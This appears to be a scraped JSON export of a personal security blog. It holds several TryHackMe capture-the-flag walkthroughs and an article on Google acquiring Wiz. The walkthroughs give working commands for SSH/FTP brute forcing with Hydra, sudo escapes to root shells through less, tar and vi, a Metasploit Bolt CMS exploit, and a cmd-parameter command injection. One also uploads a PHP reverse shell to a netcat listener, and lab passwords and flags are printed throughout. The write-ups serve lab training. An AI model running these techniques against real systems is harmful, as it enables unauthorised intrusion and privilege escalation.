jake@10.10.121.215 -p 22Once in :\nls -lacd /homels -lacd holtcat user.txtThat leads us to the user.txt flag:\nee11cbb19052e40b07aac0ca060c23eePrivilege EscalationNow to gain root access we first use sudo -l\nsudo -lThen it shows this :\nThen we see :\n/bin/less can be run as root.So immediately head to gtfo bins:\nLook up GTFOBins for less (sudo): https://gtfobins.github.io/gtfobins/less/#sudoRun less with root privilege\nsudo less /etc/profileActivate a shell within less\nType :\n!/bin/shand press Enter\nNow type the command:\nwhoamicd /rootls -lacat root.txtThis leads us to the root.txt flag\n63a9f0ea7bb98050796b649e85481845CONCLUSION :I hope this writeup walkthrough from my end was helpful to you guys. It was a quick room and in the end, it was fun to complete.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. This being my first writeup, I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"8 April 2025","externalUrl":null,"permalink":"/writeups/tryhackme/brooklyn-nine-nine-thm-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"BROOKLYN NINE NINE — THM — WRITEUP","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Ninja Skills.” NINJA SKILLS — THM — WRITEUPHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Ninja Skills.”\nIt focuses on the fundamentals of using basic tools, along providing an understanding of the linux commands.\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy it! :)\nFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nWe start by using the provided credentials from the TryHackMe (THM) page to log into the machine via SSH:\nssh new-user@10.10.203.236These are the file names given:\nNow once we enter the SSh using the credentails :\nWe begin by searching for the first file named 8V2L using the find command:\nfind / -name 8V2L 2\u0026gt;/dev/nullfind is used to search for files and directories in a directory hierarchy./ specifies the root directory, the search will start from the top of the file system and look everywhere.2\u0026gt; redirects stderr (error messages) to a location./dev/null is a special file that discards any data written to it.Hence, any permission errors or other errors will be suppressed and not shown in the output.This reveals the location: /etc/8V2L\nNow, since this chall involves multiple hidden files, we perform the search by looking for a list of known filenames:\nfind / -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy 2\u0026gt;/dev/nullThis returns a list of files located in various directories:\n/mnt/D8B3/mnt/c4ZX/var/FHl1/var/log/uqyw/opt/PFbD/opt/oiMO/media/rmfX/etc/8V2L/etc/ssh/SRSq/home/v2Vb/X1Uy\nI also notice that the file bny0 is missing.\n1. Which of the above files are owned by the best-group group?find / -type f \\( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \\) -exec ls -la {} \\; 2\u0026gt;/dev/nullFrom the output, the files owned by best-group are:\n/mnt/D8B3 /home/v2Vb\n2. Which of these files contain an IP address?grep -oE “[\\d{1,3}]\\.[\\d{1,3}]\\.[\\d{1,3}].[\\d{1,3}]” *grep → Search for a pattern in files.-o → Show only the matching part (not the whole line).-E → Use extended regular expressions (ERE).\\d{1,3} → Matches a 1 to 3-digit number.\\. → Matches a literal dot (.)This reveals that the file oiMO contains an IP address: oiMO: 1.1.1.1\n3. SHA1 Hash of Each FileTo check the SHA1 hash:\nfind / -type f \\( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \\) -exec sha1sum {} \\; 2\u0026gt;/dev/nullfind / -type f \\( -name ... \\) → Find the specified files.-exec sha1sum {} \\; → For each file, calculate its SHA1 hash.sha1sum → Outputs a unique 40-character hash for the file.2\u0026gt;/dev/null → Hide error messagesThis gives the output:\n2c8de970ff0701c8fd6c55db8a5315e5615a9575 /mnt/D8B39d54da7584015647ba052173b84d45e8007eba94 /mnt/c4ZXd5a35473a856ea30bfec5bf67b8b6e1fe96475b3 /var/FHl157226b5f4f1d5ca128f606581d7ca9bd6c45ca13 /var/log/uqyw256933c34f1b42522298282ce5df3642be9a2dc9 /opt/PFbD5b34294b3caa59c1006854fa0901352bf6476a8c /opt/oiMO4ef4c2df08bc60139c29e222f537b6bea7e4d6fa /media/rmfX0323e62f06b29ddbbe18f30a89cc123ae479a346 /etc/8V2Lacbbbce6c56feb7e351f866b806427403b7b103d /etc/ssh/SRSq7324353e3cd047b8150e0c95edf12e28be7c55d3 /home/v2Vb59840c46fb64a4faeabb37da0744a46967d87e57 /X1Uy\nAnd matching the question we see: c4ZX\n4. Which file contains 230 lines?We use the wc -l command:\nfind / -type f \\( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \\) -exec wc -l {} \\; 2\u0026gt;/dev/nullfind / -type f \\( -name ... \\) → Find the specified files.-exec wc -l {} \\; → Count the number of lines (wc -l) in each file.This shows the output:\nSince bny0 is missing, and every other file has 209 lines, I go with the answer of bny0 has 230 lines.\n5. Which file is owned by user ID 502?find / -type f \\( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \\) -exec ls -n {} \\; 2\u0026gt;/dev/nullls -n → Like ls -la, but shows numeric user/group IDs instead of names.find ... -exec ls -n {} \\; → Find and list ownership details.Then by looking at the output : The file owned by user ID 502 is: /X1Uy\n6. Which file is executable by everyone?ls -la =\u0026gt; find / -type f \\( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \\) -exec cp {} . \\; 2\u0026gt;/dev/nullTo check executable permissions: ls -larwxrwxr-x → Means read (r), write (w), and execute (x) for:\nOwner: rwx (Read, Write, Execute)Group: rwx (Read, Write, Execute)Others: r-x (Read, Execute, but NOT Write)\\( -name 8V2L -o -name bny0 -o -name c4ZX ... \\): The -o (OR) operator means it looks for files with any of these names.-exec cp {} . \\;: For each found file, execute the cp (copy) command to copy it into the current directory (.)and from this output :\nrwxrwxr-x 1 new-user new-user 13545 Oct 23 2019 /etc/8V2L8V2L file has execute (x) permissions for everyone {{ /etc/8V2L }}\nCONCLUSION:I hope this write-up walkthrough was helpful to you all! It was a quick room that gave us a touch on Linux commands .\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"6 April 2025","externalUrl":null,"permalink":"/writeups/tryhackme/ninja-skills-thm-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"NINJA SKILLS — THM — WRITEUP","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Bounty Hunter.” BOUNTY HUNTERS— THM CTF — WRITEUPHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Bounty Hunter.”\nThis room is classified as easy and is a walkthrough-type challenge. It took me around 1 m5inutes to complete, and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nOnce it’s up, let’s copy the IP address and connect to the network. We encounter a web page with some image and text.\nI initiate an Nmap scan and run a Feroxbuster scan.\nnmap 10.10.182.82 — open -sV -OThis reveals:\nFTP (port 21)SSH (port 22)A web server (port 80)feroxbuster -u http://10.10.182.82/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtThis identifies a directory:\n/imagesThen, Navigating to /images, we find an image file: crew.jpg\nI download it and try analyzing the file using strings and steghide:\nstrings crew.jpgsteghide extract -sf crew.jpgHowever, this does not yield any useful information.\nSince FTP is open, we try logging in with the default anonymous credentials:\nftp 10.10.182.82Inside the FTP directory, we check for available files:\npwdls -laAfter some time, this reveals two text files:\ntask.txtlocks.txtWe retrieve both files:\nget task.txtget locks.txtexitAfter exiting FTP, we read the contents of the files\ncat task.txtcat locks.txtThis reveals:\nusername: linA list of possible passwordsWe copy the password list into a new file\nnano pass.txtUsing Hydra, we attempt an SSH brute-force attack:\nhydra -l lin -P pass.txt ssh://10.10.182.82:22Hydra successfully finds the SSH credentials:\nUsername: linPassword: RedDr4gonSynd1cat3Gaining SSH AccessUsing the obtained credentials, we log into SSH\nssh lin@10.10.182.82 -p 22Once Inside:\npwdls -lacd /homecat user.txtUser flag obtained:\nTHM{CR1M3_SyNd1C4T3}Privilege Escalation to RootWe check if lin has sudo privilege\nsudo -lThis reveals: (root) /bin/tar\nUsing GTFOBins, we find an exploit that allows privilege escalation using tar\nWe execute the following command to get a root shell\nsudo tar -cf /dev/null /dev/null — checkpoint=1 — checkpoint-action=exec=/bin/shOnce inside the root shell, we navigate to the root directory:\npwdcd /rootls -lacat root.txtRoot flag obtained:\nTHM{80UN7Y_h4cK3r}ConclusionI hope this write-up walkthrough was helpful to you all! It was a quick room that gave us a touch on FTP access to retrieve credentials, Brute-force attack on SSH using Hydra and Privilege escalation via misconfigured tar in sudo.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. This being my first writeup, I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r.\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"1 April 2025","externalUrl":null,"permalink":"/writeups/tryhackme/bounty-hunters-thm-ctf-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"BOUNTY HUNTERS— THM CTF — WRITEUP","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Year Of The Rabbit.” YEAR OF THE RABBIT — TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Year Of The Rabbit.”\nThis room is classified as easy and is a walkthrough-type challenge. It took me around 20 minutes to complete, and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nOnce it’s up, let’s copy the IP address and connect to the network. We encounter a basic Apache page, which immediately prompts me to initiate an Nmap scan and run a Feroxbuster scan.\nnmap 10.10.124.120 — open -sV -Oferoxbuster -u http://10.10.124.120/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtThis reveals:\n3 open portsA directory: /assetsNavigating to /assets, we find files including CSS and a JavaScript file. However, after analysis, the JavaScript file doesn’t seem relevant to exploitation.\nWe continue looking for additional hidden content.\nUsing BurpSuite, we capture and analyze HTTP requests, uncovering a hidden directory. Accessing this directory, we find a PNG file named Hot_Babe.png.\nWe first try extracting hidden data using steghide, but it doesn't yield any result\nWe use the strings command to analyze the file's contents:\nstrings Hot_Babe.pngThis reveals a list of potential passwords and the FTP username: ftpuser\nBrute-Forcing FTP Credentials:We copy the extracted passwords into a text file (pass.txt).\nWe run hydra to attempt logging into FTP:\nhydra -l ftpuser -P pass.txt ftp://10.10.124.120This successfully finds the credentials:\nUsername: ftpuserPassword: 5iez1wGXKfPKQAccessing FTP and Retrieving CredentialsWe log into FTP using the obtained credentials:\nftp 10.10.124.120Inside the FTP Server:\nls -laget Eli’s_Creds.txtexitWe find a file: Eli's_Creds.txt, download it, and exit FTP\nWe open the file:\ncat Eli\\’s_Creds.txtThe format appears to be Brainfuck cipher. Using dCode’s Brainfuck decoder, we decode it to reveal:\nUsername: eliPassword: DSpDiM1wAEwidGaining SSH AccessUsing the obtained credentials, we log into SSH:\nssh eli@10.10.124.120 -p 22Once Inside:\nls -lapwdLooking for interesting files, we use:\nlocate s3cr3tcd /usr/games/s3cr3tls -lacat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!This reveals another password:\nUsername: gwendolinePassword: MniVCQVhQHUNIPrivilege Escalation to GwendolineWe switch users:\nsu gwendolineNavigating through:\ncd homecd gwendolinels -lacat user.txtWe obtain the user flag:\nTHM{1107174691af9ff3681d2b5bdb5740b1589bae53}Privilege Escalation to RootChecking sudo privileges:\nsudo -lWe see the following:\n(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txtSince vi has escape capabilities, we can spawn a root shell using:\nsudo -u#-1 /usr/bin/vi /home/gwendoline/user.txtInside vim, press : and type:\n!/bin/shPress ENTER, and we get a root shell.\nNow, we navigate to the root directory:\ncd /rootls -lacat root.txtWe obtain the root flag:\nTHM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161}CONCLUSION :I hope this write-up walkthrough was helpful to you all! It was a quick room that gave us a light touch on Web Enumeration, FTP-Brute Force, SSH Access and Privilege Escalation\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r.\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"30 March 2025","externalUrl":null,"permalink":"/writeups/tryhackme/year-of-the-rabbit-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"YEAR OF THE RABBIT — TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Bolt.” It focuses on the fundamentals of using tools… BOLT — THM CTF — WRITEUPHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Bolt.” It focuses on the fundamentals of using tools, along with an understanding of Metasploit and, specifically, Bolt CMS.\nThis room is classified as easy and is a walkthrough-type challenge. It took me around 10–20 minutes to complete, and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nOnce it’s up, let’s copy the IP address and connect to the network. We encounter a basic Apache page, which immediately prompts me to initiate an Nmap scan and run a Feroxbuster scan.\nnmap -sV -p- 10.10.55.169 — open-sV helps us discover the services running on the open ports.-p- scans all the ports (because we want to find anything and everything).--open ensures we only see the open ports.The scan reveals port 8000 is open, hosting a web service.\nVisiting http://10.10.55.169:8000/ reveals a Bolt CMS instance. Now scrolling through, I find hints about a username and a password\nUsername: bolt Password: boltadmin123Then,I attempted to inspect the page and look around for any version, but couldn’t find it.\nTo find the version, I first searched online for how to gain admin access to view the version details.\nThis led me to try /bolt/login, where I then entered the username and password. This got me in and in the bottom left corner the version was present.\nBolt CMS 3.7.1Next, we need to find the ExploitDB entry for the version. Since we know that Bolt CMS 3.7.1 is running, I searched ExploitDB for a known Remote Code Execution (RCE) exploit.\nEDB-ID: 48296Next, I turn to Metasploit and run\nmsfconsoleThen, I search for the exploit using the command:\nsearch bolt 3.7.1After running the search, I get the following result on my screen: exploit/unix/webapp/bolt_authenticated_rce\nThen I use these commands in order:\noptionsuse 0 {command selects the first exploit}set lhost 10.4.1.240 {command sets (Local Host), our machine’s IP}set rhost 10.10.55.169 {command sets (RemoteHost), target’s IP}set username bolt {sets the username for authentication}set password boltadmin123{sets the password for authentication}Now we execute:\nrunSuccess!\nNow the goal is to locate the flag:\nwhoami {displays the current user you are logged in as}ls -la {lists all the files in the current directory}cd ../ {command changes the directory by moving you one level up}pwd {prints the current working directory}cd /home {changes the directory to the home / could do cd ../ x2 also}ls -laThen we see the flag.txt file there and perform cat:\ncat flag.txt {displays the contents of the flag.txt}THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}CONCLUSION :I hope this write-up walkthrough was helpful to you all! It was a quick room that gave us a light touch on Metasploit and, honestly, it made me want to watch the Bolt movie again! I’m going to watch it now!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. This being my first writeup, I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r.\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"25 March 2025","externalUrl":null,"permalink":"/writeups/tryhackme/bolt-thm-ctf-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"BOLT — THM CTF — WRITEUP","type":"writeups"},{"content":" A few days ago, on March 18th, 2025, the tech world was shook by an announcement that seemed almost surreal. Breaking headlines flooded the… How Google’s $32 Billion Acquisition of Wiz is Set to Transform Cloud Security with AIA few days ago, on March 18th, 2025, the tech world was shook by an announcement that seemed almost surreal. Breaking headlines flooded the internet: “Google has acquired Wiz”. This news sent ripples through the entire tech industry, particularly in the world of cybersecurity and cloud computing, and I couldn’t help but rush to my laptop to dig into the details.\nThis wasn’t the first time we’d heard of such a deal. A few months ago, a similar acquisition was in the works, pegged at $22 billion. But it fell through, mainly due to regulatory concerns faced by Google. The deal seemed doomed. So, when I saw the headlines again, this time with a $32 billion price tag, I was both surprised and intrigued. What changed? Why is this happening now? What does this mean for the future of cybersecurity and cloud computing?\nThe $32 Billion Deal: Google Acquires WizOn March 18, 2025, Google officially announced it had signed a definitive agreement to acquire Wiz, a cloud security firm based in New York. The deal, valued at $32 billion (subject to closing adjustments), was an all-cash transaction, and once finalized, Wiz will become part of Google Cloud.\nThis acquisition is not only a major financial move for Google but also a strategic one, as Google aims to strengthen its position in the highly competitive cloud security space. As CEO Sundar Pichai mentioned in a March 18 webcast,\n“Security is a fundamental priority for CEOs and government leaders around the world. The security landscape has changed, and the pace and impact of breaches are accelerating. AI brings new risks, but also new opportunities.”Wiz’s Origins: From Adallom to Cloud Security PowerhouseAssaf Rappaport: CEO, Ami Luttwak: CTO, Yinnon Costica: VP Product, Roy Reznik: VP R\u0026amp;DBefore founding Wiz, the four Israeli entrepreneurs behind the startup had already achieved success in the tech industry. In 2012, they founded Adallom, a cloud security firm based in Tel Aviv. Adallom was sold to Microsoft three years later for $320 million, at the time setting the record for the most Microsoft had ever paid for an Israeli tech company. The four worked together at Microsoft’s R\u0026amp;D center in Herzliya, where they led Microsoft Azure’s Cloud Security Group.\nHowever, in 2020, as the world shifted toward a remote work environment due to the COVID-19 pandemic, the demand for cloud security solutions surged. The founders saw an opportunity to establish Wiz, creating a solution that secured multi-cloud environments and addressing the rising cybersecurity risks that businesses were facing.\nWiz’s Rapid Growth: A Cloud Security LeaderWiz quickly gained traction, offering a fast-growing multi-cloud security platform that was powered by AI. With cloud adoption on the rise, businesses sought more robust security solutions, and Wiz was perfectly positioned to meet this demand. The company’s customer base now spans over 40% of the Fortune 100 companies, including major players like BMW, Slack, Agoda, and Plaid.\nBy 2024, Wiz was valued at $12 billion, having rapidly grown its annual revenue from $1 million in 2022 to $350 million by the end of 2024. In fact, Wiz’s marketing and growth strategy were so effective that nearly half of the Fortune 500 companies now use their software.\nThe success of Wiz has also earned the company’s founders a spot on Forbes’ list of the world’s richest people, with each of them now worth around $1 billion\nThe Technology Behind Wiz: Securing the Cloud with AIOne of the key differentiators for Wiz is its approach to cloud security. Traditional security platforms require the deployment of individual agents on every device to secure them, a process that can be both time-consuming and resource-intensive. Wiz, on the other hand, uses agentless security, meaning companies don’t need to deploy separate security programs on each device.\nInstead, Wiz connects directly to a cloud environment and uses digital twin technology to create a simulated model of the cloud setup. This model allows security experts to assess potential risks, prioritize them, and respond more effectively.\nAdditionally, Wiz’s user interface makes it easy for businesses to monitor their cloud environments. One tool, for example, displays a web chart showing all the connections in a cloud environment, helping security teams understand how a breach could impact the entire system.\nThis combination of agentless security and digital twin technology is what sets Wiz apart from its competitors and positions it as a leader in the rapidly evolving AI-driven cybersecurity space.\nGoogle’s Strategic Move: What This Acquisition Means for Google CloudPrevious Acquisitions by GoogleThis acquisition is a game-changer for Google Cloud, allowing the company to compete more effectively with major players like Amazon Web Services (AWS) and Microsoft Azure. Google Cloud’s revenue was just $43 billion in 2024, significantly lower than AWS’s $105.4 billion and Azure’s $107.6 billion. With the acquisition of Wiz, Google is making a big push to narrow this gap.\nIn addition to the acquisition, Google’s security portfolio includes other important assets such as Mandiant, VirusTotal, and Chronicle (now Google Security Operations). Wiz’s AI-powered security solutions will enhance Google Cloud’s capabilities and position Google as a serious player in the enterprise security market.\nAI and the Future of Cloud SecurityAI plays a pivotal role in cloud security, and Wiz’s technology exemplifies how artificial intelligence can be integrated into cybersecurity platforms. AI helps Wiz identify potential threats faster and more accurately, providing businesses with real-time threat detection and response capabilities.\nHowever, as with any technology, there are risks associated with the use of AI in security. As AI evolves, so do the potential threats, and organizations must remain vigilant to keep up with emerging risks.\nThe growing role of AI in cloud security positions Google and Wiz to lead the next wave of innovation in this space, offering more advanced tools to tackle increasingly sophisticated cyberattacks.\nChallenges and Risks AheadWhile the acquisition of Wiz presents many opportunities, there are also significant risks. One of the key challenges is regulatory scrutiny. Google is already facing antitrust cases, and its acquisition of Wiz could come under the microscope as well. Additionally, Google agreed to a reverse termination fee of $3.2 billion, which is one of the highest of all time, underscoring the high stakes involved.\nMoreover, Wiz is currently involved in a patent infringement lawsuit with Orca, another cloud cybersecurity company. Orca claims that Wiz is using its patented technologies without authorization. If this lawsuit continues, it could potentially complicate the acquisition.\nConclusion: A New Chapter in Cloud SecurityGoogle’s $32 billion acquisition of Wiz marks a new era in cloud security, particularly in the realm of AI-driven solutions. As cloud adoption continues to grow, the demand for advanced security platforms like Wiz will only increase. By bringing Wiz into the fold, Google has strengthened its cloud offerings and positioned itself as a formidable player in the cybersecurity space.\nWith AI playing a crucial role in the future of cloud security, this acquisition could significantly shape the industry, offering businesses smarter, more efficient solutions to address growing cybersecurity risks.\nReferencesGoogle Blog — Google Acquires WizThe Hacker News — Google Acquires Wiz for $32 BillionInvestor’s Business Daily — Google Stock and CybersecuritySeeking Alpha — Google-Wiz DealThe Verge — Google Acquires WizTimes of Israel — From Waze to Wiz: How Google Learned to Love Israeli Tech ","date":"24 March 2025","externalUrl":null,"permalink":"/articles/security-research-articles/how-google-s-32-billion-acquisition-of-wiz-is-set-to-transform-cloud-security-with-ai/","section":"Security Research \u0026 Articles","summary":"","title":"How Google’s $32 Billion Acquisition of Wiz is Set to Transform Cloud Security with AI","type":"articles"},{"content":" Hello everyone! This is an easy room from the TryHackMe platform called “Jack-of-All-Trades”. The room is a simple boot-to-root machine… Jack-of-All-Trades — THM — WriteupHello everyone! This is an easy room from the TryHackMe platform called “Jack-of-All-Trades”. The room is a simple boot-to-root machine with the objective of finding the user flag and then the root flag.\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nNo need to have that expression on your face, I know you’re just here for the sauce😹First, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready\nOnce it’s up, let’s paste the IP address and connect to the network. This is what we have in front of us:\nHowever, when encountering the “restricted” error, here’s a quick solution:\nOpen a new tab in your browser (in my case, Firefox).Click the three horizontal lines in the top-right corner to access the menu.Select Settings from the menu.Scroll all the way down to the Network Settings section.Click on the Settings button next to it.In the settings window, choose the Manual proxy configuration option.Enter the desired IP address and set the port number to 22, as this port is used for HTTP connections.Then, refresh the page, and you will be directed to the desired destination.\nImmediately run nmap on the tab and wait for the results, after which I use feroxbuster to scan with the following command:\nferoxbuster -u http://10.10.59.210:22/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x 100I decided to open the /assets folder in a new tab. To my surprise, I found 4 files listed there.\nThen back to the web page, I start by looking through the page but don’t find anything that stands out. So, I decide to hit Inspect to dig into the page’s source code.\nWhile inspecting, I spot /recovery.php \u0026amp; notice some Base64 encoded text .\nI grab the Base64 string and decode it, revealing:\"Remember to wish Johny Graves well with his crypto jobhunting! His encoding systems are amazing! Also gotta remember your password: u?WtKSraq.\"I try out “Johnny Graves” and “Jack” as usernames with this passwords, but no luck.\nSo, I go back and inspect the login page once more, hoping to find a clue and then I come across another encoded string which on looking tells me it’s a BASE32.\nIn a hurry, I attempt different decoding methods like ASCII and EBCDIC, but neither works.\nThen taking a step back, I search online for Johnny Graves’ encoding method, and discover: “First, use ROT13, then Hex, then Base32.\nWith this info, I drop the Base32 string into CyberChef and decode it in the correct order: Base32 → Hex → ROT13.\nThe decoded message gives me a hint:\n“Remember that the credentials to the recovery login are hidden on the homepage! Here’s a hint: bit.ly/2TvYQ2S”.I follow the hint and see Stegosauria pop up in the wiki. It also happens to be in the /assets folder as a file called steg with an image of a dinosaur.\nAt this point, I start thinking — could it be steganography? ( becasue the word “stego” was there and my 1st task in 1st ever CTF was steg 😂)I try decoding two images, and finally, header.jpg works and I discover the credentials:\nUsername: jackintheboxPassword: TplFxiSHjYUsing the credentials, I successfully log in to the system, I inspect the page’s source, but there’s nothing useful at first and then notice “GET” in caps, leading me to think it’s a GET request.\nAnd, it clearly mentions cmd, which prompts me to toy with the cmd parameter.\nhttp://10.10.59.210/nnxhweOV/index.php?cmd=idhttp://10.10.59.210/nnxhweOV/index.php?cmd=ls+-lahttp://10.10.59.210/nnxhweOV/index.php?cmd=ls+-la+/homehttp://10.10.59.210/nnxhweOV/index.php?cmd=whoamiThe ls command reveals a file named jacks_password_list.\nI use index.php?cmd=cat+/home/jacks_password_list to reveal a key hash.\nI copy the hash and save it into a text file using nano jak.txt.I then run Hydra to crack the SSH password:\nhydra -l jack -P jak.txt ssh://10.10.59.210:80Then, Hydra gives me the login credentials:\nUsername: jackPassword: ITMJpGGIqg1jn?\u0026gt;@I SSH into the machine using: ssh jack@10.10.59.210 -p 80 and then run:\nls -la to check out the files in the home directory\nThe user.jpg catches my eye and I run a Python HTTP server\npython -m SimpleHTTPServer 5000In a new tab, I use wget to download the image:\nwget http://10.10.59.210:5000/user.jpgI open the downloaded image with eog:\neog user.jpg.1The user flag is visible in the image, I then press Ctrl + C to stop the initial terminal command.\nsecuri-tay2020_{p3ngu1n-hunt3r-3xtr40rd1n41r3}I search for setuid files using:\nfind / -perm -u=s -type f 2\u0026gt;/dev/nullI find /usr/bin/strings in the output, I then run strings on the root flag file.\nstrings /root/root.txtRoot flagsecuri-tay2020_{6f125d32f38fb8ff9e720d2dbce2210a}CONCLUSION:I hope this writeup walkthrough from my end was helpful to you guys.\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well.\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r.\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"18 March 2025","externalUrl":null,"permalink":"/writeups/tryhackme/jack-of-all-trades-thm-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"Jack-of-All-Trades — THM — Writeup","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Vulnversity.” VULNVERSITY -THM -WRITEUPHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Vulnversity.”\nIt focuses on the fundamentals of using basic tools, along providing an understanding of Nmap, Gobuster, rev shell and privelege escalation.\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy it! :)\nFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nReconnaissance:We start by enumerating open ports and services\nnmap 10.10.204.172 — open {This helps show the open ports}nmap 10.10.204.172 -sV {This helps show the open ports}nmap 10.10.204.172 — open -O {This helps show the open ports}Locating directories using Gobuster:After identifying a web server (port 3333), we brute-force directories using Gobuster\ngobuster dir -u http://10.10.204.172:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtgobuster dir → Runs a directory enumeration scan.-u → Specifies the URL to scan.-w → Uses a wordlist to find hidden directories.Scan reveals the /internal/ directory and it leads to a file upload page.\nCompromise the Webserver:Now, with the task of compromising access, we utilise php-reverse-shell.\nFirst we go to Pentest Monkeys github link provided and copy paste it in a text file. Then we need to change the $IP to our sytem $IP. After this we name the file and save it.\nNext we set up a Netcat listner :\nnc -lvnp 1234nc → Runs Netcat, a network tool.-l → Listens for incoming connections.-v → Verbose mode (shows connection details).-n → No DNS resolution (faster).-p 1234 → Specifies the listening porNext, we upload the php-reverse-shell.phtml file via the upload option.\nThen to trigger it, we visit:\nhttp://10.10.204.172:3333/internal/uploads/php-reverse-shell.phtmlBy doing so, We get a reverse shell on the system as the web server user (www-data).\nNow that we are in, we first check the present working directory\npwdsudo -lDoesn’t work (no 